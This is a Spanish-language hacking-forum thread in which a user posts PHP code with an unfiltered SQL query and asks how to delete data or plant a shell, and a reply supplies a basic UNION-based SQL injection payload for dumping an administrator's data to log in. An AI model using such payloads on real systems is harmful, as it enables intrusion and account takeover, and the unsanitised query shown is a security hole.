elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:57  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  SQL injection, obtener mas informacion o borrara datos		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: SQL injection, obtener mas informacion o borrara datos  (Leído 1,360 veces)
xalupeao

Desconectado Desconectado

Mensajes: 18


Ver Perfil
SQL injection, obtener mas informacion o borrara datos
« en: 7 Marzo 2011, 09:29 »
Bueno amigos tengo la siguiente duda.

tengo esta sentencia sql

Código:
$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");

$faq=mysql_fetch_array($thefaq);

y para desplegar la salida html realiza la verificacion

Código:
if($faq[question]){

..... sale el HTML

}

como podria borrar datos o bien como podria ingresar una shell.

sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: SQL injection, obtener mas informacion o borrara datos
« Respuesta #1 en: 7 Marzo 2011, 18:31 »
Te encuentras en frente de una iSQL básica. Es sólo cuestión de inyectarle código para printear los datos de un super usuario, y así logguearte dentro de la aplicación. En este caso sería algo como,
Código
#
SELECT question, answer, lasteditedby, lastedit
  FROM faq
 WHERE id=''+UNION+ALL+SELECT+1,2,3,4--'
#

La inyección sería,
Código
'+union+all+select+1,2,3,4--

Tienes que leer tutoriales :D
En línea
---
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Obtener informacion por la cmd
Hacking Básico 		sch3m4 4 843 Último mensaje 29 Mayo 2006, 17:57
por sch3m4
Obtener tablas con SQL Injection (mysql 4)
Nivel Web 		Leber 3 6,689 Último mensaje 12 Septiembre 2009, 11:38
por tomrian
Obtener datos de una base de datos postgres con un resultset
Programación General 		marvic 0 1,975 Último mensaje 6 Febrero 2009, 17:24
por marvic
Obtener informacion?
Programación Visual Basic 		CAR3S? 7 732 Último mensaje 13 Febrero 2011, 23:54
por CAR3S?
Informacion tablas y columnas con sql injection en mysql 4.x
Nivel Web 		opportunity 4 2,596 Último mensaje 1 Marzo 2011, 08:06
por opportunity
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines